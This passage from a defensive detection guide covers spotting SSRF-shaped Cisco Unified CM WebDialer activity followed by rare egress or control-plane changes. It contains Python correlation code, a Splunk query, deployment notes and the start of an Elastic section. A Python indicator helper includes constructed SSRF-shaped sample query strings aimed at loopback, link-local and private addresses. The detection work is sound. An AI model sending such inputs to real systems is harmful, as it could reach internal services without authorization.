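from typing import Dict, List, Optional

# Assumed local tuning values for the two correlation windows (seconds).
RARE_EGRESS_WINDOW = 4 * 3600
CONTROL_PLANE_WINDOW = 24 * 3600

WEBDIALER = "webdialer_suspicious_activity"
EGRESS = "rare_cucm_egress"
CONTROL = "cucm_control_plane_change"


@dataclass(frozen=True)
class Candidate:
    candidate_type: str   # one of WEBDIALER, EGRESS, CONTROL
    cucm_scope: str       # normalized shared scope (node, cluster, backend host, ...)
    time: int             # epoch seconds


@dataclass(frozen=True)
class Finding:
    cucm_scope: str
    first_webdialer_time: int
    first_rare_egress_time: Optional[int]
    first_control_change_time: Optional[int]
    correlated_path_count: int
    severity: str
    confidence: str
    detection_outcome: str


def _first_in_window(rows: List[Candidate], ctype: str, t0: int, window: int) -> Optional[int]:
    """Earliest candidate of type ctype at or after t0 and no later than t0 + window."""
    hits = [c.time for c in rows if c.candidate_type == ctype and t0 <= c.time <= t0 + window]
    return min(hits) if hits else None


def correlate(candidates: List[Candidate]) -> Dict[str, Finding]:
    """Group candidates by cucm_scope and apply the severity tiers per scope."""
    by_scope: Dict[str, List[Candidate]] = {}
    for c in candidates:
        by_scope.setdefault(c.cucm_scope, []).append(c)

    findings: Dict[str, Finding] = {}
    for scope, rows in by_scope.items():
        wd_times = [c.time for c in rows if c.candidate_type == WEBDIALER]
        if not wd_times:
            continue  # egress or change without a WebDialer trigger is out of scope here
        t0 = min(wd_times)
        egress = _first_in_window(rows, EGRESS, t0, RARE_EGRESS_WINDOW)
        control = _first_in_window(rows, CONTROL, t0, CONTROL_PLANE_WINDOW)
        paths = int(egress is not None) + int(control is not None)

        base = "Suspicious Cisco Unified CM WebDialer activity"
        if paths >= 2:
            sev, conf, outcome = "critical", "High", base + " followed by rare egress and voice-control-plane change"
        elif control is not None:
            sev, conf, outcome = "high", "Medium to High", base + " followed by voice-control-plane change"
        elif egress is not None:
            sev, conf, outcome = "high", "Medium to High", base + " followed by rare egress"
        else:
            sev, conf, outcome = "medium", "Medium", base

        findings[scope] = Finding(scope, t0, egress, control, paths, sev, conf, outcome)
    return findings


# Constructed sample candidates (not real telemetry); times are epoch seconds.
SAMPLE_CANDIDATES = [
    Candidate(WEBDIALER, "cucm-pub-01", 1_000),
    Candidate(EGRESS,    "cucm-pub-01", 1_600),     # 10 min later: inside the egress window
    Candidate(CONTROL,   "cucm-pub-01", 8_200),     # 2 h later: inside the control-plane window
    Candidate(WEBDIALER, "cucm-sme-01", 2_000),
    Candidate(EGRESS,    "cucm-sme-01", 5_600),     # 1 h later: rare egress only
    Candidate(EGRESS,    "cucm-sub-02", 4_000),     # before the WebDialer event: ignored
    Candidate(WEBDIALER, "cucm-sub-02", 5_000),
    Candidate(CONTROL,   "cucm-sub-02", 100_000),   # about 26 h later: outside the window
    Candidate(CONTROL,   "cucm-sub-03", 100),       # change with no WebDialer trigger
]


def demo() -> Dict[str, Finding]:
    return correlate(SAMPLE_CANDIDATES)


if __name__ == "__main__":
    for scope, f in sorted(demo().items()):
        print(f"{scope}: {f.severity} ({f.confidence}) paths={f.correlated_path_count} - {f.detection_outcome}")
```

Two design points differ from the SPL pattern on this page and are deliberate: the model keeps the standalone medium tier (the SPL pattern's final filter only emits scopes that have at least one follow-on path), which is what hunt-mode baselining needs, and it discards follow-on events that precede the first WebDialer event, which matches the "first valid event after the WebDialer activity" semantics of the query.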

Required Telemetry

Splunk summary index or accelerated dataset for suspicious WebDialer activity.

Splunk summary index or accelerated dataset for rare Cisco Unified CM egress.

Splunk summary index or accelerated dataset for Cisco Unified CM control-plane change activity.

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Approved voice administrator source lookup.

Approved WebDialer workflow lookup.

Approved call-management integration lookup.

Approved monitoring source lookup.

Approved scanner lookup.

Approved provider-managed source lookup.

Approved patch-validation source lookup.

Approved maintenance-window lookup.

Approved Cisco Unified CM asset lookup.

Approved Cisco Unified CM SME asset lookup.

Approved voice-management subnet lookup.

Approved Cisco Unified CM egress destination lookup.

Source reputation lookup.

Recently seen destination-domain and destination-IP baseline.

Engineering Implementation Instructions

Create scheduled candidate searches that populate cucm_webdialer_suspicious_activity_summary, cucm_rare_egress_summary, and cucm_control_plane_change_summary before enabling the final correlation search.

Map source IP, forwarded source IP, normalized source IP, destination host, destination IP, backend host, backend IP, virtual host, URI path, query string, full URL, HTTP method, HTTP status, request size, response size, user agent, WebDialer endpoint category, SSRF parameter indicator, source reputation, destination reputation, DNS query, proxy action, firewall action, NAT egress identity, Cisco Unified CM node, Cisco Unified CM SME node, Cisco Unified CM cluster, voice-management segment, administrator, administrative action, service name, service action, file path, file action, route-plan object, call-routing change, and event timestamp fields to the customer’s local Splunk schema.

Use macros to abstract local index, sourcetype, data model, and field mappings. Recommended macros include cucm_webdialer_candidate_summaries, cucm_rare_egress_summaries, cucm_control_plane_change_summaries, cucm_asset_lookup, cucm_source_reputation_lookup, cucm_allowed_context_lookup, and cucm_summary_time_bounds.

Validate summary population before alert-mode deployment. The final correlation should operate on summary data rather than broad raw telemetry.

Build and validate lookups for Cisco Unified CM assets, Unified CM SME assets, WebDialer-enabled assets, voice-management segments, approved administrators, approved WebDialer workflows, approved call-management integrations, approved monitoring sources, approved scanner sources, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved egress destinations, approved route-plan changes, approved service restarts, approved backup jobs, and approved emergency remediation.

Normalize Unified CM correlation identity with a stable cucm_scope field. The field should resolve to the best available shared scope across Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Avoid raw joins, large subsearch membership checks, unbounded transaction commands, and broad negative filters over high-volume proxy, DNS, firewall, web, and endpoint indexes. Use summary indexes, accelerated datasets, lookups, bounded time windows, candidate-specific fields, and eventstats over reduced candidate sets.

Run in hunt mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, route-plan changes, cluster communication, and expected voice-platform egress.

Treat macro validation, lookup freshness, summary-index completeness, field normalization, time-window tuning, allowlist quality, false-positive testing, and SOC triage output fields as required local deployment work.

DRI Assessment

High resilience where WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement inventory, source reputation, rare egress baselines, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry are normalized into reliable summaries. Resilience is lower where WebDialer URI visibility, Unified CM administrative telemetry, or stable Unified CM scope mapping is unavailable.

DRI

8.7 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious WebDialer activity and high when WebDialer candidates correlate with rare egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

8.4 / 10

Full-Telemetry TCR

9.3 / 10

Limitations

This rule depends on summary-search quality, URI-preserving WebDialer telemetry, Unified CM asset inventory, stable correlation scope, and local allowlist freshness. Encrypted traffic without HTTP metadata, missing WebDialer logs, incomplete administrative audit telemetry, stale asset inventory, or unreliable NAT/backend mapping may reduce confidence. Legitimate click-to-call workflows, provider support, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

Splunk SPL summary-correlation pattern for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity followed by the first valid rare-egress or voice-control-plane change event that occurs after the WebDialer activity. This pattern assumes scheduled candidate searches populate cucm_webdialer_suspicious_activity_summary, cucm_rare_egress_summary, and cucm_control_plane_change_summary. Local index, sourcetype, macro, lookup, field-name, timing-window, summary-index, and data-model validation are required before production deployment.

index=summary source=cucm_webdialer_suspicious_activity_summary earliest=-ENV_CUCM_CORRELATION_LOOKBACK latest=now
| eval candidate_type="webdialer_suspicious_activity", webdialer_time=_time
| eval cucm_scope=coalesce(cucm_scope, cucm_cluster_id, cucm_node_id, cucm_asset, backend_host, dest_host, dest, host, dvc, device_name, nat_egress_identity, voice_management_segment)
| eval webdialer_src_ip=src_ip, webdialer_forwarded_src_ip=forwarded_src_ip
| lookup cucm_assets cucm_scope AS cucm_scope OUTPUT is_cucm_asset, cucm_asset_role, webdialer_enabled
| lookup cucm_approved_webdialer_sources src_ip AS webdialer_src_ip OUTPUT is_approved_webdialer_source, approved_source_type
| lookup cucm_approved_admin_sources src_ip AS webdialer_src_ip OUTPUT is_approved_admin_source, approved_admin_source_type
| lookup source_reputation src_ip AS webdialer_src_ip OUTPUT source_reputation, source_asn, source_geo, is_hosting_provider, is_residential_proxy, is_suspicious_asn
| lookup cucm_change_context cucm_scope AS cucm_scope OUTPUT is_approved_change, approved_change_type, change_window
| fillnull value="false" is_cucm_asset webdialer_enabled is_approved_webdialer_source is_approved_admin_source is_hosting_provider is_residential_proxy is_suspicious_asn is_approved_change
| where is_cucm_asset="true" AND webdialer_enabled="true"
| eval ssrf_request_indicator=if(is_loopback_reference="true" OR is_link_local_reference="true" OR is_private_address_reference="true" OR is_internal_hostname_reference="true" OR is_nested_url_parameter="true" OR is_unexpected_url_scheme="true" OR is_encoded_url_scheme="true" OR is_double_encoded_destination="true" OR is_backend_fetch_error="true" OR is_host_header_anomaly="true", 1, 0)
| eval webdialer_source_risk=if(is_approved_webdialer_source!="true" AND is_approved_admin_source!="true", 1, 0)
| eval webdialer_reputation_risk=if(is_hosting_provider="true" OR is_residential_proxy="true" OR is_suspicious_asn="true", 1, 0)
| eval webdialer_behavior_risk=if(webdialer_event_type IN ("abnormal_webdialer_access","webdialer_request_from_unapproved_source","webdialer_access_outside_click_to_call_workflow","webdialer_backend_fetch_behavior","webdialer_response_anomaly","webdialer_failure_to_success_pattern","suspicious_source_to_voice_management_plane") OR ssrf_request_indicator=1 OR webdialer_source_risk=1 OR webdialer_reputation_risk=1, 1, 0)
| where webdialer_behavior_risk=1 AND is_approved_change!="true"
| fields candidate_type, webdialer_time, cucm_scope, cucm_asset_role, webdialer_src_ip, webdialer_forwarded_src_ip, http_method, uri_path, query_string, full_url, http_status, user_agent, request_size, response_size, webdialer_event_type, ssrf_request_indicator, webdialer_source_risk, webdialer_reputation_risk, source_reputation, source_asn, source_geo, approved_source_type, approved_admin_source_type, approved_change_type, change_window
| append [
search index=summary source=cucm_rare_egress_summary earliest=-ENV_CUCM_CORRELATION_LOOKBACK latest=now
| eval candidate_type="rare_cucm_egress", rare_egress_time=_time
| eval cucm_scope=coalesce(cucm_scope, cucm_cluster_id, cucm_node_id, cucm_asset, source_host, src_host, host, dvc, device_name, nat_egress_identity, voice_management_segment)
| eval egress_src_ip=src_ip, egress_src_host=src_host, egress_dest_ip=dest_ip, egress_dest_domain=dest_domain, egress_dest_port=dest_port
| lookup cucm_assets cucm_scope AS cucm_scope OUTPUT is_cucm_asset, cucm_asset_role
| lookup cucm_approved_egress_destinations dest_ip AS egress_dest_ip OUTPUT is_approved_egress_ip, approved_egress_type
| lookup cucm_approved_egress_domains dest_domain AS egress_dest_domain OUTPUT is_approved_egress_domain, approved_egress_domain_type
| lookup destination_reputation dest_domain AS egress_dest_domain OUTPUT destination_reputation, destination_category, destination_first_seen
| fillnull value="false" is_cucm_asset is_approved_egress_ip is_approved_egress_domain
| where is_cucm_asset="true"
| eval rare_egress_risk=if(is_approved_egress_ip!="true" AND is_approved_egress_domain!="true" AND (is_new_destination_for_cucm_node="true" OR is_new_destination_for_voice_management_segment="true" OR destination_reputation IN ("unknown","suspicious","malicious") OR egress_event_type IN ("rare_outbound_connection","unexpected_external_egress","unexpected_dns_resolution","connection_to_unapproved_destination","connection_to_unknown_reputation_destination","connection_to_suspicious_reputation_destination","egress_not_in_voice_platform_baseline")), 1, 0)
| where rare_egress_risk=1
| fields candidate_type, rare_egress_time, cucm_scope, cucm_asset_role, egress_src_ip, egress_src_host, egress_dest_ip, egress_dest_domain, egress_dest_port, transport, egress_event_type, destination_reputation, destination_category, destination_first_seen, approved_egress_type, approved_egress_domain_type
]
| append [
search index=summary source=cucm_control_plane_change_summary earliest=-ENV_CUCM_CORRELATION_LOOKBACK latest=now
| eval candidate_type="cucm_control_plane_change", control_change_time=_time
| eval cucm_scope=coalesce(cucm_scope, related_cucm_scope, cucm_cluster_id, cucm_node_id, cucm_asset, related_cucm_asset, management_host, host, dvc, device_name, voice_management_segment)
| eval control_src_ip=src_ip, control_management_host=management_host
| lookup cucm_assets cucm_scope AS cucm_scope OUTPUT is_cucm_asset, cucm_asset_role
| lookup cucm_approved_admins administrator AS administrator OUTPUT is_approved_administrator, administrator_role
| lookup cucm_approved_change_types change_type AS change_type OUTPUT is_approved_change_type, approved_change_type
| lookup cucm_change_context cucm_scope AS cucm_scope OUTPUT is_approved_change, approved_context_type, change_window
| fillnull value="false" is_cucm_asset is_approved_administrator is_approved_change_type is_approved_change
| where is_cucm_asset="true"
| eval control_plane_risk=if(control_event_type IN ("cucm_file_created","cucm_file_modified","cucm_service_restart","cucm_administrative_configuration_change","cucm_route_plan_change","cucm_call_routing_change","new_cucm_administrator_created","cucm_administrator_modified","management_login_from_new_source","unusual_cluster_communication","voice_service_instability","unexpected_shell_activity") AND is_approved_change!="true" AND is_approved_change_type!="true", 1, 0)
| where control_plane_risk=1
| fields candidate_type, control_change_time, cucm_scope, cucm_asset_role, administrator, administrator_role, control_src_ip, control_management_host, service_name, service_action, file_path, file_action, route_plan_object, call_routing_change, change_type, control_event_type, approved_context_type, change_window
]
| eventstats min(webdialer_time) AS first_webdialer_time values(uri_path) AS webdialer_paths values(query_string) AS webdialer_queries values(full_url) AS webdialer_urls values(webdialer_event_type) AS webdialer_event_types values(webdialer_src_ip) AS webdialer_sources values(webdialer_forwarded_src_ip) AS forwarded_webdialer_sources values(source_asn) AS webdialer_source_asns values(source_geo) AS webdialer_source_geos values(ssrf_request_indicator) AS ssrf_request_indicators values(webdialer_source_risk) AS webdialer_source_risks values(webdialer_reputation_risk) AS webdialer_reputation_risks by cucm_scope
| where isnotnull(first_webdialer_time)
| eval valid_rare_egress_time=if(isnotnull(rare_egress_time) AND rare_egress_time>=first_webdialer_time AND rare_egress_time-first_webdialer_time<=ENV_CUCM_RARE_EGRESS_WINDOW, rare_egress_time, null())
| eval valid_control_change_time=if(isnotnull(control_change_time) AND control_change_time>=first_webdialer_time AND control_change_time-first_webdialer_time<=ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW, control_change_time, null())
| eval valid_rare_egress_dest_ip=if(isnotnull(valid_rare_egress_time), egress_dest_ip, null())
| eval valid_rare_egress_dest_domain=if(isnotnull(valid_rare_egress_time), egress_dest_domain, null())
| eval valid_rare_egress_dest_port=if(isnotnull(valid_rare_egress_time), egress_dest_port, null())
| eval valid_rare_egress_event_type=if(isnotnull(valid_rare_egress_time), egress_event_type, null())
| eval valid_rare_egress_reputation=if(isnotnull(valid_rare_egress_time), destination_reputation, null())
| eval valid_control_event_type=if(isnotnull(valid_control_change_time), control_event_type, null())
| eval valid_administrator=if(isnotnull(valid_control_change_time), administrator, null())
| eval valid_management_host=if(isnotnull(valid_control_change_time), control_management_host, null())
| eval valid_service_name=if(isnotnull(valid_control_change_time), service_name, null())
| eval valid_service_action=if(isnotnull(valid_control_change_time), service_action, null())
| eval valid_file_path=if(isnotnull(valid_control_change_time), file_path, null())
| eval valid_file_action=if(isnotnull(valid_control_change_time), file_action, null())
| eval valid_route_plan_object=if(isnotnull(valid_control_change_time), route_plan_object, null())
| eval valid_call_routing_change=if(isnotnull(valid_control_change_time), call_routing_change, null())
| eval valid_change_type=if(isnotnull(valid_control_change_time), change_type, null())
| eventstats min(valid_rare_egress_time) AS first_rare_egress_time values(valid_rare_egress_dest_ip) AS rare_egress_dest_ips values(valid_rare_egress_dest_domain) AS rare_egress_dest_domains values(valid_rare_egress_dest_port) AS rare_egress_dest_ports values(valid_rare_egress_event_type) AS rare_egress_event_types values(valid_rare_egress_reputation) AS rare_egress_reputations by cucm_scope
| eventstats min(valid_control_change_time) AS first_control_change_time values(valid_control_event_type) AS control_event_types values(valid_administrator) AS administrators values(valid_management_host) AS management_hosts values(valid_service_name) AS service_names values(valid_service_action) AS service_actions values(valid_file_path) AS file_paths values(valid_file_action) AS file_actions values(valid_route_plan_object) AS route_plan_objects values(valid_call_routing_change) AS call_routing_changes values(valid_change_type) AS change_types by cucm_scope
| where isnotnull(first_rare_egress_time) OR isnotnull(first_control_change_time)
| eval time_to_rare_egress=first_rare_egress_time-first_webdialer_time
| eval time_to_control_change=first_control_change_time-first_webdialer_time
| eval has_rare_egress=if(isnotnull(first_rare_egress_time), 1, 0)
| eval has_control_plane_change=if(isnotnull(first_control_change_time), 1, 0)
| eval correlated_path_count=has_rare_egress+has_control_plane_change
| eval confidence=case(correlated_path_count>=2, "High", correlated_path_count=1, "Medium to High", true(), "Medium")
| eval severity=case(correlated_path_count>=2, "critical", has_control_plane_change=1, "high", has_rare_egress=1, "high", true(), "medium")
| eval detection_outcome=case(correlated_path_count>=2, "Suspicious Cisco Unified CM WebDialer activity followed by rare egress and voice-control-plane change", has_control_plane_change=1, "Suspicious Cisco Unified CM WebDialer activity followed by voice-control-plane change", has_rare_egress=1, "Suspicious Cisco Unified CM WebDialer activity followed by rare egress", true(), "Suspicious Cisco Unified CM WebDialer activity")
| stats values(webdialer_event_types) AS webdialer_event_types values(webdialer_paths) AS webdialer_paths values(webdialer_queries) AS webdialer_queries values(webdialer_urls) AS webdialer_urls values(webdialer_sources) AS webdialer_sources values(forwarded_webdialer_sources) AS forwarded_webdialer_sources values(webdialer_source_asns) AS webdialer_source_asns values(webdialer_source_geos) AS webdialer_source_geos values(ssrf_request_indicators) AS ssrf_request_indicators values(webdialer_source_risks) AS webdialer_source_risks values(webdialer_reputation_risks) AS webdialer_reputation_risks values(rare_egress_dest_ips) AS rare_egress_dest_ips values(rare_egress_dest_domains) AS rare_egress_dest_domains values(rare_egress_dest_ports) AS rare_egress_dest_ports values(rare_egress_event_types) AS rare_egress_event_types values(rare_egress_reputations) AS rare_egress_reputations values(control_event_types) AS control_event_types values(administrators) AS administrators values(management_hosts) AS management_hosts values(service_names) AS service_names values(service_actions) AS service_actions values(file_paths) AS file_paths values(file_actions) AS file_actions values(route_plan_objects) AS route_plan_objects values(call_routing_changes) AS call_routing_changes values(change_types) AS change_types min(first_webdialer_time) AS first_webdialer_time min(first_rare_egress_time) AS first_rare_egress_time min(first_control_change_time) AS first_control_change_time max(time_to_rare_egress) AS time_to_rare_egress max(time_to_control_change) AS time_to_control_change max(correlated_path_count) AS correlated_path_count values(detection_outcome) AS detection_outcome values(confidence) AS confidence values(severity) AS severity by cucm_scope
| table first_webdialer_time, first_rare_egress_time, first_control_change_time, time_to_rare_egress, time_to_control_change, cucm_scope, correlated_path_count, severity, confidence, webdialer_event_types, webdialer_paths, webdialer_queries, webdialer_urls, webdialer_sources, forwarded_webdialer_sources, webdialer_source_asns, webdialer_source_geos, ssrf_request_indicators, webdialer_source_risks, webdialer_reputation_risks, rare_egress_dest_ips, rare_egress_dest_domains, rare_egress_dest_ports, rare_egress_event_types, rare_egress_reputations, control_event_types, administrators, management_hosts, service_names, service_actions, file_paths, file_actions, route_plan_objects, call_routing_changes, change_types, detection_outcome
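The ssrf_request_indicator eval in the pattern above consumes flag fields (is_loopback_reference, is_link_local_reference, is_private_address_reference, is_internal_hostname_reference, is_nested_url_parameter, is_unexpected_url_scheme, is_encoded_url_scheme, is_double_encoded_destination) that the scheduled candidate search must already have populated. The following is an added example, not code from the CyberDax report, Cisco, or Splunk, of how a feeder for cucm_webdialer_suspicious_activity_summary could derive those flags from a request's query string. Parameter names, the internal-suffix list and the sample query strings are constructed assumptions; no real WebDialer parameter is implied.

```python
"""Derive SSRF-shaped parameter indicators from a WebDialer request query string.

Added example; not code from the CyberDax report, Cisco, or Splunk. Parameter
names, the internal-suffix list and the sample query strings are constructed.
"""
import ipaddress
import re
from typing import Dict
from urllib.parse import parse_qs, unquote, urlsplit

EXPECTED_SCHEMES = {"http", "https"}                          # assumption
INTERNAL_SUFFIXES = (".local", ".internal", ".corp", ".lan")  # assumption
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
ENCODED_SEP_RE = re.compile(r"%3a%2f%2f", re.IGNORECASE)      # "://" percent-encoded once

INDICATORS = (
    "is_loopback_reference", "is_link_local_reference", "is_private_address_reference",
    "is_internal_hostname_reference", "is_nested_url_parameter",
    "is_unexpected_url_scheme", "is_encoded_url_scheme", "is_double_encoded_destination",
)


def _classify_host(host: str, flags: Dict[str, bool], from_url: bool) -> None:
    """Flag loopback, link-local, private or internal-looking hosts.

    Bare parameter values are only checked as IP literals: a user name or an
    extension number must not be mistaken for a single-label internal hostname.
    """
    host = host.strip()
    if not host:
        return
    try:
        addr = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        h = host.lower()
        if from_url and (h == "localhost" or h.endswith(INTERNAL_SUFFIXES) or "." not in h):
            flags["is_internal_hostname_reference"] = True
        return
    if addr.is_loopback:
        flags["is_loopback_reference"] = True
    elif addr.is_link_local:
        flags["is_link_local_reference"] = True
    elif addr.is_private:
        flags["is_private_address_reference"] = True


def ssrf_indicators(query_string: str) -> Dict[str, bool]:
    """Return the indicator flags for one request's query string."""
    flags = {name: False for name in INDICATORS}
    # parse_qs percent-decodes once; decoding again exposes a double-encoded destination.
    for values in parse_qs(query_string, keep_blank_values=True).values():
        for once in values:
            twice = unquote(once)
            if twice != once and (SCHEME_RE.match(twice) or ENCODED_SEP_RE.search(once)):
                flags["is_double_encoded_destination"] = True
            value = twice if SCHEME_RE.match(twice) else once
            if SCHEME_RE.match(value):
                flags["is_nested_url_parameter"] = True
                parts = urlsplit(value)
                if parts.scheme.lower() not in EXPECTED_SCHEMES:
                    flags["is_unexpected_url_scheme"] = True
                _classify_host(parts.hostname or "", flags, from_url=True)
            else:
                _classify_host(value, flags, from_url=False)
    if ENCODED_SEP_RE.search(query_string):
        flags["is_encoded_url_scheme"] = True
    return flags


def ssrf_request_indicator(query_string: str) -> int:
    """Collapse the flags the way the SPL eval does: 1 if any indicator fired."""
    return int(any(ssrf_indicators(query_string).values()))


# Constructed sample query strings (not captured traffic); parameter names are invented.
SAMPLE_QUERIES = {
    "benign_click_to_call": "destination=5551234&user=jdoe",
    "loopback_nested": "redirect=http%3A%2F%2F127.0.0.1%2Fstatus",
    "link_local_bare": "target=169.254.10.20",
    "double_encoded_private": "next=http%253A%252F%252F10.0.0.5%252Fstatus",
    "unexpected_scheme": "callback=ftp%3A%2F%2Fcucm-pub.corp%2F",
}

if __name__ == "__main__":
    for name, qs in SAMPLE_QUERIES.items():
        fired = [k for k, v in ssrf_indicators(qs).items() if v]
        print(f"{name}: indicator={ssrf_request_indicator(qs)} {fired}")
```

String inspection only sees what the request carries. A hostname that resolves to an internal address only when the appliance fetches it, or a Host-header anomaly, leaves no trace in the query string, which is why the pattern also carries is_backend_fetch_error and is_host_header_anomaly from response-side telemetry and still correlates with rare egress and control-plane change rather than alerting on the request alone.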

Elastic

Detection Viability Assessment

Production-ready as an Elastic transform-backed KQL and EQL correlation pattern where Cisco Unified CM / Unified CM SME WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement state, approved-source context, source reputation, rare egress context, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry can be normalized into ECS-aligned candidate data streams.

This rule should not be deployed as broad raw cross-index correlation over high-volume proxy, firewall, DNS, web, endpoint, and administrative telemetry. Production deployment should use transforms, enrichment policies, value lists, exception lists, and candidate indices that pre-stage suspicious WebDialer activity, rare Unified CM egress, and voice-control-plane change candidates. The final EQL sequences should operate over reduced candidate data and correlate by a stable Cisco Unified CM scope field.

Rule

Cisco Unified CM WebDialer SSRF Candidate Followed by Rare Egress or Voice-Control-Plane Change

Rule Format

Elastic transform-backed KQL and EQL correlation pattern requiring local ECS field mapping, data-view validation, transform validation, enrichment-policy validation, value-list validation, exception-list validation, threshold validation, timing-window tuning, and environment-specific allowlisting before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM / Unified CM SME WebDialer activity that aligns with SSRF-shaped request behavior and is followed by rare outbound communication, administrative change, service manipulation, file activity, route-plan change, call-routing change, abnormal management access, or voice-control-plane instability tied to the same Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management scope.

Detection Logic

Trigger when transform-backed WebDialer candidate data identifies suspicious WebDialer activity against a Cisco Unified CM or Unified CM SME asset with WebDialer enabled, especially when the request includes abnormal WebDialer paths, unapproved source context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response transitions, failure-to-success patterns, or source reputation risk.

Assign medium severity when suspicious WebDialer activity occurs against a Unified CM or Unified CM SME asset outside approved WebDialer workflows, monitoring, provider support, vulnerability scanning, patch validation, or maintenance.

Assign high severity when suspicious WebDialer activity is followed within the local rare-egress correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer activity is followed within the local control-plane correlation window by administrative configuration change, service restart, file creation, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, administrative identity, or voice-management scope.

Promote to critical when suspicious WebDialer activity converges with rare egress and control-plane change, or when correlated telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.

Required Telemetry

Elastic transform-backed Cisco Unified CM WebDialer suspicious activity candidate data stream.

Elastic transform-backed Cisco Unified CM rare egress candidate data stream.

Elastic transform-backed Cisco Unified CM control-plane change candidate data stream.

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Elastic ECS-aligned source, destination, host, url, http, user, event, rule, file, process, and network fields where available.

Elastic enrichment fields for Cisco Unified CM asset role, WebDialer enablement, approved source status, approved administrator status, approved change status, source reputation, destination reputation, and voice-management scope.

Elastic value lists for approved WebDialer sources, approved administrators, approved provider-managed sources, approved scanner sources, approved monitoring sources, approved patch-validation sources, approved egress destinations, approved route-plan changes, approved service restarts, approved maintenance windows, and approved emergency remediation.

Engineering Implementation Instructions

Create transform-backed candidate data streams for suspicious WebDialer activity, rare Cisco Unified CM egress, and Cisco Unified CM control-plane change before enabling the final EQL sequence rule.

Map source IP, forwarded source IP, normalized source IP, destination host, destination IP, backend host, backend IP, virtual host, URI path, query string, full URL, HTTP method, HTTP status code, request size, response size, user agent, WebDialer endpoint category, SSRF parameter indicator, source reputation, destination reputation, DNS query, proxy action, firewall action, NAT egress identity, Cisco Unified CM node, Cisco Unified CM SME node, Cisco Unified CM cluster, voice-management segment, administrator, administrative action, service name, service action, file path, file action, route-plan object, call-routing change, and event timestamp fields to ECS or customer-local enrichment fields.

Create a stable labels.cucm_scope enrichment field that resolves to the best available shared identity across Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Use Elastic transforms or ingest pipelines to populate candidate labels such as labels.is_cucm_asset, labels.webdialer_enabled, labels.webdialer_suspicious, labels.webdialer_event_type, labels.ssrf_request_indicator, labels.webdialer_source_risk, labels.webdialer_reputation_risk, labels.is_rare_cucm_egress, labels.rare_egress_event_type, labels.is_approved_egress_destination, labels.destination_reputation, labels.is_cucm_control_plane_change, labels.control_event_type, labels.is_approved_change, labels.is_approved_change_type, and labels.cucm_scope.

Use enrichment policies and value lists to identify Cisco Unified CM assets, Unified CM SME assets, WebDialer-enabled assets, voice-management segments, approved WebDialer sources, approved call-management integrations, approved administrators, approved monitoring sources, approved scanners, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved egress destinations, approved route-plan changes, approved service restarts, approved backup jobs, and approved emergency remediation.

Use the KQL blocks as transform or candidate-filter logic. Use the EQL sequences as the final correlation logic. Do not deploy the KQL candidate filters and EQL correlation sequences as a single mixed-language rule without adapting them to the customer’s Elastic rule type.

Avoid broad raw cross-index EQL over unbounded WAF, proxy, firewall, DNS, endpoint, and administrative data. Use transform-backed candidate indices, bounded maxspan windows, ECS-compatible mappings, enrichment fields, value lists, and exception lists.

Run in hunt mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, route-plan changes, cluster communication, and expected voice-platform egress.

Treat ECS mapping, local field aliases, transform freshness, enrichment-policy quality, value-list coverage, exception-list quality, timing-window tuning, false-positive testing, and SOC triage output fields as required local deployment work.

DRI Assessment

High resilience where WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement inventory, source reputation, rare egress baselines, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry are normalized into transform-backed candidate data streams. Resilience is lower where WebDialer URI visibility, Unified CM administrative telemetry, transform freshness, or stable Unified CM scope mapping is unavailable.

DRI

8.6 / 10

TCR Assessment

